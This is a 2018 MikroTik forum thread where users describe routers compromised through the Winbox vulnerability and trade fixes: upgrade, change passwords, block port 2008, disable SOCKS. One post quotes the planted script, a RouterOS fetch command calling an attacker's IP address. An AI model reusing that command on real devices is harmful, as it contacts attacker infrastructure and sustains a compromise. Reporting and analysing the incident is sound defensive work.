Community discussions

MikroTik App
 
prekshapatel
just joined
Topic Author
Posts: 5
Joined: Tue Jul 24, 2018 1:34 pm

fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Tue Jul 24, 2018 1:57 pm

We are observing some fetch:file “mikrotik.php” automatically downloaded in all type of devices i.e. SXT lite, RB 750 UP, RB 2011UIAS groove etc.
We see script added to mikrotik again and again, even after upgrading to latest version.

[img]file:///C:/Preksha%20Patel/Mikrotik.PNG[/img]
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24941
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Tue Jul 24, 2018 2:06 pm

upgrade device to 6.40.8 or 6.42.6 and change your password. also improve your network security according to these guides:
https://blog.mikrotik.com
No answer to your question? How to write posts
 
prekshapatel
just joined
Topic Author
Posts: 5
Joined: Tue Jul 24, 2018 1:34 pm

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Tue Jul 24, 2018 2:46 pm

Socks is also getting enabled automatically in the devices where this file is getting downloaded. Kindly suggest why this is happening?
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24941
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Tue Jul 24, 2018 2:53 pm

Please read above post.
No answer to your question? How to write posts
 
crashpunk
just joined
Posts: 10
Joined: Sat Apr 05, 2008 9:36 pm

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Tue Jul 24, 2018 5:33 pm

Normis ... I'm Being Attacked by This Vulnerability, 17 Hours ago the Attack Began, 07/23/2018 16:00 GMT-3. I have Installed RouterOS v6.41.3 and the www service disabled but they have still entered and installed a script.
I think they injected the script from another service, I'm not sure. But I Can See the Hour.-
I'm running backup and updating to the latest version but I think the vulnerability is still there, I'm going to deactivate all external services except Winbox for the moment and change password.
Screenshot:
You do not have the required permissions to view the files attached to this post.
Last edited by crashpunk on Wed Jul 25, 2018 11:04 pm, edited 4 times in total.
 
User avatar
mrz
MikroTik Support
MikroTik Support
Posts: 6258
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia
Contact:

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Tue Jul 24, 2018 5:34 pm

Upgrade to version that is not vulnerable. See details here:
https://blog.mikrotik.com/security/winb ... ility.html
 
msatter
Forum Guru
Forum Guru
Posts: 2139
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Tue Jul 24, 2018 7:38 pm

How can that happen? I missed totally missed the announcement of the blog by Mikrotik.
Loving my freedom and so, no Twitter, no Facebook/Instagram/WhatsApp, no Apple and no Google/Alphabet, no Amazon/Cloudfront/AWS.

Running:
RouterOS 6.49Beta / Winbox 3.27 64bits
 
Jessieblueyu
just joined
Posts: 3
Joined: Tue Jul 24, 2018 11:06 pm

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Tue Jul 24, 2018 11:11 pm

I see the same behavior in my RB951G-2HnD - log shows that mikrotik.php was downloaded (I see it in the files section - it is blank php file) followed by a lot of telnet login attempts.

I upgraded to the latest version, changed the telnet and ssh ports.

Results:
No more telnet login attempts present in log.
Downloading of the mikrotik.php file continues (!!!)

What is happening here? How do I stop this?
 
Jessieblueyu
just joined
Posts: 3
Joined: Tue Jul 24, 2018 11:06 pm

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Tue Jul 24, 2018 11:20 pm

I closed the WinBox access from WAN but the downloading of the mikrotik.php continues every 30 seconds exactly.

Any ideas?
 
Jessieblueyu
just joined
Posts: 3
Joined: Tue Jul 24, 2018 11:06 pm

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Tue Jul 24, 2018 11:30 pm

OK I understood now what "they" did:

Somehow they managed to set up a script (created by my user!?) with the following content:

/tool fetch address=95.154.216.165 port=2008 src-path=/mikrotik.php mode=http
Apart from fetching this empty .php file I don't see any other actions anywhere else.

After I removed the script, silent times came back... but this was disturbing...
 
crashpunk
just joined
Posts: 10
Joined: Sat Apr 05, 2008 9:36 pm

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices  [SOLVED]

Tue Jul 24, 2018 11:36 pm

Thank You mrz, Fixed Problem.
I read in the Blog about the Attack on the Web Service. I did not see that the same problem was presented at port 8291 of WinBox.
 
TomosRider
Member Candidate
Member Candidate
Posts: 203
Joined: Thu Nov 20, 2014 1:51 pm

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Wed Jul 25, 2018 5:01 pm

Hello guys!
I noticed this problem today. Found malicious script under system/scripts.Remove it.
Upgrade ROS did'nt helped.
Change your passwords, block port 2008, turn off ip/socks!!!
 
crashpunk
just joined
Posts: 10
Joined: Sat Apr 05, 2008 9:36 pm

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Wed Jul 25, 2018 11:22 pm

Hello guys!
I noticed this problem today. Found malicious script under system/scripts.Remove it.
Upgrade ROS did'nt helped.
Change your passwords, block port 2008, turn off ip/socks!!!
TomosRider could inject the script after updating RouterOS v6.42.6 ..?
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24941
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Thu Jul 26, 2018 7:53 am

Everyone, the issue is that somebody could have gotten your password a long time ago, through the winbox vulnerability published a few months ago. Even if you have upgraded, they still have your password, they just used it now. So upgrade fixes the vulnerability, but you have to change your password after upgrading.
No answer to your question? How to write posts

Who is online

Users browsing this forum: No registered users and 17 guests